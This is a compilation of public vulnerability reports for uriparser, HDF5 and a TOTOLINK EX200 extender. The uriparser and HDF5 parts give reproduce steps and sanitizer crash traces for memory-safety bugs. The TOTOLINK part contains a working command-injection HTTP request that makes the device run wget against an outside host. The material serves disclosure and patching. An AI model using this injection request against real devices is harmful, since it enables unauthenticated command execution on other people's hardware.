An issue was discovered in uriparser before 0.9.6. It performs invalid free operations in uriFreeUriMembers and uriMakeOwner.

A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand.  
The bug was found with a fuzzer based on the test-code"TestNormalizeSyntaxMaskRequired"

\__crash log_

    ==2151==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004d9be0 (pc 0x00000041ca94 bp 0x000000000000 sp 0x7fff34437d00 T0)
    ==2151==The signal is caused by a WRITE memory access.
        #0 0x41ca94 in __asan::Allocator::Deallocate(void*, unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType)
        #1 0x493d41 in free 
        #2 0x4c6892 in (anonymous namespace)::countingFree(UriMemoryManagerStruct*, void*)
        #3 0x7fca1c05a4b2 in uriNormalizeSyntaxExMmA_ 
    

Steps to reproduce:

1.  git clone https://github.com/uriparser/uriparser.git
2.  cd uriparser & mkdir build & cd build
3.  Build  
    cmake -DCMAKE\_BUILD\_TYPE=Release -DURIPARSER\_BUILD\_DOCS:BOOL=OFF -DBUILD\_SHARED\_LIBS:BOOL=ON ..  
    make -j8
4.  Download the attached file(1.cpp)
5.  Build TEST CODE (1.cpp)  
    clang++ -g -fsanitize=address,fuzzer-no-link -o 1 1.cpp -I uriparser/include/ -Luriparser/build -luriparser
6.  Run  
    LD\_LIBRARY\_PATH=uriparser/build/ ./1

OS:ubuntu 18.04  
uriparser\_poc1.tar.gz

CVE-2021-46141: .hostText memory is not properly duped/freed in uriNormalizeSyntax*, uriMakeOwner*, uriFreeUriMembers* for some URIs · Issue #121 · uriparser/uriparser

An issue was discovered in uriparser before 0.9.6. It performs invalid free operations in uriNormalizeSyntax.

A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand.  
The bug was found with a fuzzer based on the test-code"NormalizeSyntaxExMm"

\__crash log_

    ==3440==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004d9be0 (pc 0x00000041ca94 bp 0x000000000000 sp 0x7ffd2468e6e0 T0)
    ==3440==The signal is caused by a WRITE memory access.
        #0 0x41ca94 in __asan::Allocator::Deallocate(void*, unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType)
        #1 0x493d41 in free 
        #2 0x4c6892 in (anonymous namespace)::countingFree(UriMemoryManagerStruct*, void*) 
        #3 0x7faf2e1ac4b2 in uriNormalizeSyntaxExMmA_ 
    

Steps to reproduce:

1.  git clone https://github.com/uriparser/uriparser.git
2.  cd uriparser & mkdir build & cd build
3.  Build  
    cmake -DCMAKE\_BUILD\_TYPE=Release -DURIPARSER\_BUILD\_DOCS:BOOL=OFF -DBUILD\_SHARED\_LIBS:BOOL=ON ..  
    make -j8
4.  Download the attached file(2.cpp)
5.  Build TEST CODE (2.cpp)  
    clang++ -g -fsanitize=address,fuzzer-no-link -o 2 2.cpp -I uriparser/include/ -I uriparser/ -Luriparser/build -luriparser
6.  Run  
    LD\_LIBRARY\_PATH=uriparser/build/ ./2

OS:ubuntu 18.04  
uriparser\_poc2.tar.gz

CVE-2021-46142: uriNormalizeSyntax* may free stack memory in out-of-memory situation when handling URIs containing empty segments · Issue #122 · uriparser/uriparser

A Stack-based Buffer Overflow Vulnerability exists in HDF5 1.13.1-1 via the H5D__create_chunk_file_map_hyper function in /hdf5/src/H5Dchunk.c, which causes a Denial of Service (context-dependent).

**Version:**

**System information**

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

**command:**

POC3.zip

**ASAN information**

    ================================================================
    ==3192859==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc401ba928 at pc 0x5582bd69885b bp 0x7ffc401b8720 sp 0x7ffc401b8710
    READ of size 8 at 0x7ffc401ba928 thread T0
        #0 0x5582bd69885a in H5D__create_chunk_file_map_hyper /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1927
        #1 0x5582bd69885a in H5D__chunk_io_init_selections /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1250
        #2 0x5582bd69885a in H5D__chunk_io_init /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1129
        #3 0x5582bd14a71e in H5D__read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dio.c:250
        #4 0x5582bd60459a in H5VL__native_dataset_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLnative_dataset.c:293
        #5 0x5582bd5d6442 in H5VL__dataset_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:2045
        #6 0x5582bd5d6442 in H5VL_dataset_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:2077
        #7 0x5582bd11da4d in H5D__read_api_common /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5D.c:968
        #8 0x5582bd11da4d in H5Dread /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5D.c:1020
        #9 0x5582bd04b454 in h5tools_dump_simple_dset /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools_dump.c:1755
        #10 0x5582bd04b454 in h5tools_dump_dset /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools_dump.c:1956
        #11 0x5582bd05fa5f in h5tools_dump_data /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools_dump.c:4425
        #12 0x5582bd01bb3c in dump_dataset /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:1046
        #13 0x5582bd0245c1 in dump_all_cb /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:350
        #14 0x5582bd23d995 in H5G__iterate_cb /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gint.c:866
        #15 0x5582bd23d995 in H5G__iterate_cb /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gint.c:839
        #16 0x5582bd24e3ec in H5G__node_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gnode.c:967
        #17 0x5582bd67e5a3 in H5B__iterate_helper /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5B.c:1152
        #18 0x5582bd681cca in H5B_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5B.c:1194
        #19 0x5582bd25b699 in H5G__stab_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gstab.c:536
        #20 0x5582bd255216 in H5G__obj_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gobj.c:672
        #21 0x5582bd24061c in H5G_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gint.c:922
        #22 0x5582bd2dc94f in H5L_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Lint.c:2243
        #23 0x5582bd610f3e in H5VL__native_link_specific /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLnative_link.c:366
        #24 0x5582bd5e75fe in H5VL__link_specific /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:5305
        #25 0x5582bd5e75fe in H5VL_link_specific /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:5339
        #26 0x5582bd2cec7f in H5L__iterate_api_common /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5L.c:1659
        #27 0x5582bd2cec7f in H5Literate2 /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5L.c:1695
        #28 0x5582bd01acc1 in link_iteration /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:614
        #29 0x5582bd01acc1 in dump_group /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:886
        #30 0x5582bd00f1e0 in main /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump.c:1547
        #31 0x7ff7f59ae0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #32 0x5582bd01520d in _start (/home/zxq/CVE_testing/source/hdf5-add/hdf5/build/bin/h5dump+0x17c20d)
    
    Address 0x7ffc401ba928 is located in stack of thread T0 at offset 8472 in frame
        #0 0x5582bd691fbf in H5D__chunk_io_init /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1071
    
      This frame has 35 object(s):
        [32, 33) 'bogus' (line 1166)
        [48, 56) 'udata' (line 1256)
        [80, 88) 'tmp_fchunk' (line 1809)
        [112, 120) 'chunk_points' (line 2151)
        [144, 152) 'tmp_count' (line 2152)
        [176, 200) 'iter_op' (line 1255)
        [240, 264) 'iter_op' (line 1297)
        [304, 336) 'is_partial_dim' (line 1615)
        [368, 624) 'file_dims' (line 1605)
        [688, 944) 'zeros' (line 1607)
        [1008, 1264) 'coords' (line 1609)
        [1328, 1584) 'end' (line 1610)
        [1648, 1904) 'scaled' (line 1611)
        [1968, 2224) 'curr_partial_clip' (line 1613)
        [2288, 2544) 'partial_dim_size' (line 1614)
        [2608, 2864) 'start_scaled' (line 1817)
        [2928, 3184) 'scaled' (line 1818)
        [3248, 3504) 'file_sel_start' (line 1987)
        [3568, 3824) 'file_sel_end' (line 1988)
        [3888, 4144) 'mem_sel_start' (line 1989)
        [4208, 4464) 'mem_sel_end' (line 1990)
        [4528, 4784) 'adjust' (line 1991)
        [4848, 5104) 'coords' (line 2036)
        [5168, 5424) 'chunk_adjust' (line 2037)
        [5488, 5744) 'mem_sel_start' (line 2140)
        [5808, 6064) 'mem_sel_end' (line 2141)
        [6128, 6392) 'old_offset' (line 1073)
        [6464, 6728) 'coords' (line 1520)
        [6800, 7064) 'sel_start' (line 1521)
        [7136, 7400) 'sel_end' (line 1522)
        [7472, 7736) 'sel_start' (line 1810)
        [7808, 8072) 'sel_end' (line 1811)
        [8144, 8408) 'start_coords' (line 1813)
        [8480, 8744) 'coords' (line 1814) <== Memory access at offset 8472 underflows this variable
        [8816, 9080) 'end' (line 1815)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1927 in H5D__create_chunk_file_map_hyper
    Shadow bytes around the buggy address:
      0x10000802f4d0: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000802f4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000802f4f0: 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00
      0x10000802f500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000802f510: 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2
    =>0x10000802f520: f2 f2 f2 f2 f2[f2]00 00 00 00 00 00 00 00 00 00
      0x10000802f530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000802f540: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10000802f550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000802f560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000802f570: 00 f3 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3192859==ABORTING

CVE-2021-45833: stack-buffer-overflow at H5D__create_chunk_file_map_hyper /hdf5/src/H5Dchunk.c:1927 · Issue #1313 · HDFGroup/hdf5

A Stack-based Buffer Overflow Vulnerability exists in HDF5 1.13.1-1 at at hdf5/src/H5Eint.c, which causes a Denial of Service (context-dependent).

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==223590==ERROR: AddressSanitizer: stack-overflow on address 0x7ffee0f76f70 (pc 0x7fd7a0c52b99 bp 0x7ffee0f777c0 sp 0x7ffee0f76f60 T0)
        #0 0x7fd7a0c52b98 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10db98)
        #1 0x7fd7a088ccbd  (/lib/x86_64-linux-gnu/libc.so.6+0x8ecbd)
        #2 0x55d14d2e76d2 in vasprintf /usr/include/x86_64-linux-gnu/bits/stdio2.h:213
        #3 0x55d14d2e76d2 in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/
        #4 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #5 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #6 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #7 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #8 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #9 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #10 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #11 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #12 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #13 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #14 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #15 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #16 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #17 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #18 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #19 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #20 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #21 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #22 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #23 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #24 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #25 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #26 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #27 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #28 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #29 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #30 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #31 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #32 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #33 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #34 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #35 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #36 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #37 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #38 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #39 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #40 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #41 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #42 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #43 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326
        #44 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766
        #45 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687
        #46 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326

CVE-2021-45832: stack overflow at hdf5/src/H5Eint.c · Issue #1315 · HDFGroup/hdf5

A heap-based buffer overflow vulnerability exists in HDF5 1.13.1-1 via H5F_addr_decode_len in /hdf5/src/H5Fint.c, which could cause a Denial of Service.

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

    ==3895624==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000053a0 at pc 0x55f43fe64fa1 bp 0x7fff5fa6dc60 sp 0x7fff5fa6dc50
    READ of size 1 at 0x6060000053a0 thread T0
        #0 0x55f43fe64fa0 in H5F_addr_decode_len /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:2855
        #1 0x55f43ffd5f01 in H5O__fsinfo_decode /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Ofsinfo.c:186
        #2 0x55f43ffefb74 in H5O_msg_read_oh /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Omessage.c:514
        #3 0x55f43fff033b in H5O_msg_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Omessage.c:455
        #4 0x55f43fe7e8d7 in H5F__super_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fsuper.c:782
        #5 0x55f43fe6b6d1 in H5F_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:1963
        #6 0x55f44029730b in H5VL__native_file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLnative_file.c:127
        #7 0x55f44026b72b in H5VL__file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:3497
        #8 0x55f44026b72b in H5VL_file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:3646
        #9 0x55f43fe46570 in H5F__open_api_common /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5F.c:795
        #10 0x55f43fe4a7eb in H5Fopen /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5F.c:836
        #11 0x55f43fce521b in h5tools_fopen /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools.c:932
        #12 0x55f43fcdcafa in main /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5format_convert/h5format_convert.c:409
        #13 0x7f67d18450b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #14 0x55f43fce03ed in _start (/home/zxq/CVE_testing/source/hdf5-add/hdf5/build/bin/h5format_convert+0x16e3ed)
    
    0x6060000053a0 is located 0 bytes to the right of 64-byte region [0x606000005360,0x6060000053a0)
    allocated by thread T0 here:
        #0 0x7f67d1c72bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x55f43febb1fe in H5FL__malloc /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5FL.c:238
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:2855 in H5F_addr_decode_len
    Shadow bytes around the buggy address:
      0x0c0c7fff8a20: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
      0x0c0c7fff8a30: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0c7fff8a40: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c0c7fff8a50: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
      0x0c0c7fff8a60: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
    =>0x0c0c7fff8a70: 00 00 00 00[fa]fa fa fa 00 00 00 00 00 00 00 fa
      0x0c0c7fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc

CVE-2021-45830: heap-buffer-overflow atH5F_addr_decode_len /hdf5/src/H5Fint.c:2855 · Issue #1314 · HDFGroup/hdf5

The downloadFlile.cgi binary file in TOTOLINK EX200 V4.0.3c.7646_B20201211 has a command injection vulnerability when receiving GET parameters. The parameter name can be constructed for unauthenticated command execution.

Permalink

Cannot retrieve contributors at this time

**ToTolink EX200 Comand Injection****Venda && Firmware\_link**

ToTolink EX200 http://totolink.net/home/menu/detail/menu\_listtpl/download/id/144/ids/36.html

link :http://totolink.net/data/upload/20210428/7979e841521515eb83b45aacf5b67f9a.zip

Firmware\_link :V4.0.3c.7646\_B20201211

**Describe**

​ The downloadFlile.cgi binary file has a command injection vulnerability when receiving GET parameters. The parameter name can be constructed for unauthenticated command execution

![image-20211020110137084](https://github.com/doudoudedi/ToTolink_EX200_Cmmand_Execute/raw/main/img/image-20211020110137084.png)

​ In the downloadFile cgi program, the QUERY\_STRING environment parameter variable is the content of the GET request, so the parameter name can be controlled for command injection

**POC**

    GET /cgi-bin/downloadFlile.cgi?;wget${IFS}http://192.168.0.111:801/mm.txt;=hahah HTTP/1.1
    
    Host: 192.168.0.254
    
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
    
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
    Accept-Language: en-US,en;q=0.5
    
    Accept-Encoding: gzip, deflate
    
    Connection: close
    
    Upgrade-Insecure-Requests: 1
    

**TEXT**

​ Listen to port 801 locally, and the browser accesses the following URL

![image-20211020114318773](https://github.com/doudoudedi/ToTolink_EX200_Cmmand_Execute/raw/main/img/image-20211020114318773.png)

​ can see that the wireless extender has successfully connected to the local port 801

![image-20211020114301709](https://github.com/doudoudedi/ToTolink_EX200_Cmmand_Execute/raw/main/img/image-20211020114301709.png)

**Reporting process****2021.10.20 found this vuln****2021.10.22 apply for vender****2021.11.03 fix vuln**

The manufacturer's email indicates that the vulnerability has been fixed, but maybe can't issue an announcement

**2021.11.11 public this vuln****CNVD-2021-85251**

https://www.cnvd.org.cn/flaw/show/CNVD-2021-85251

CVE-2021-43711: ToTolink_EX200_Cmmand_Execute/ToTolink EX200 Comand Injection2.md at main · doudoudedi/ToTolink_EX200_Cmmand_Execute

HDF5 1.13.1-1 is affected by: segmentation fault, which causes a Denial of Service.

**Version:**

**System information**

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

**command:**

POC8.zip

**result**

**ASAN information**

    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102
    3102  malloc.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102
    #1  0x000055555566ff52 in H5MM_xfree (mem=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5MM.c:557
    #2  0x0000555555693fb1 in H5O__link_reset (_mesg=0x55555594d4b0) at /home/zxq/CVE_testing/source/hdf5/src/H5Olink.c:564
    #3  0x0000555555695d8d in H5O__msg_reset_real (type=<optimized out>, type=<optimized out>, native=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:589
    #4  H5O_msg_reset (type_id=type_id@entry=0x6, native=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:556
    #5  0x0000555555631d78 in H5G__link_release_table (ltable=ltable@entry=0x7fffffffd990) at /home/zxq/CVE_testing/source/hdf5/src/H5Glink.c:517
    #6  0x0000555555802355 in H5G__compact_iterate (oloc=oloc@entry=0x55555594d3d8, linfo=<optimized out>, idx_type=idx_type@entry=H5_INDEX_NAME, 
        order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gcompact.c:412
    #7  0x000055555563887f in H5G__obj_iterate (grp_oloc=grp_oloc@entry=0x55555594d3d8, idx_type=H5_INDEX_NAME, order=order@entry=H5_ITER_INC, 
        skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=op@entry=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gobj.c:661
    #8  0x0000555555630b64 in H5G_visit (loc=loc@entry=0x7fffffffdbc0, group_name=<optimized out>, idx_type=<optimized out>, order=H5_ITER_INC, 
        op=<optimized out>, op_data=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Gint.c:1243
    #9  0x00005555557ae1f5 in H5VL__native_link_specific (obj=<optimized out>, loc_params=0x7fffffffdc40, args=0x7fffffffdc70, dxpl_id=<optimized out>, 
        req=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLnative_link.c:374
    #10 0x000055555579d200 in H5VL__link_specific (cls=<optimized out>, req=0x0, dxpl_id=0xb00000000000008, args=0x7fffffffdc70, loc_params=0x7fffffffdc40, 
        obj=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5305
    #11 H5VL_link_specific (vol_obj=vol_obj@entry=0x55555594b890, loc_params=loc_params@entry=0x7fffffffdc40, args=args@entry=0x7fffffffdc70, 
        dxpl_id=0xb00000000000008, req=req@entry=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5339
    #12 0x0000555555664b41 in H5Lvisit_by_name2 (loc_id=loc_id@entry=0x100000000000000, group_name=group_name@entry=0x5555558166e4 "/", 
        idx_type=H5_INDEX_NAME, order=H5_ITER_INC, op=op@entry=0x55555557eda0 <traverse_cb>, op_data=op_data@entry=0x7fffffffdd40, lapl_id=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5L.c:1984
    #13 0x000055555558040e in traverse (fields=0x1f, visitor=0x7fffffffdd00, recurse=0x1, visit_start=<optimized out>, grp_name=0x5555558166e4 "/", 
        file_id=0x100000000000000) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:288
    #14 h5trav_visit (fid=0x100000000000000, grp_name=0x5555558166e4 "/", visit_start=<optimized out>, recurse=<optimized out>, visit_obj=<optimized out>, 
        visit_lnk=<optimized out>, udata=0x7fffffffde80, fields=0x1f) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:1057
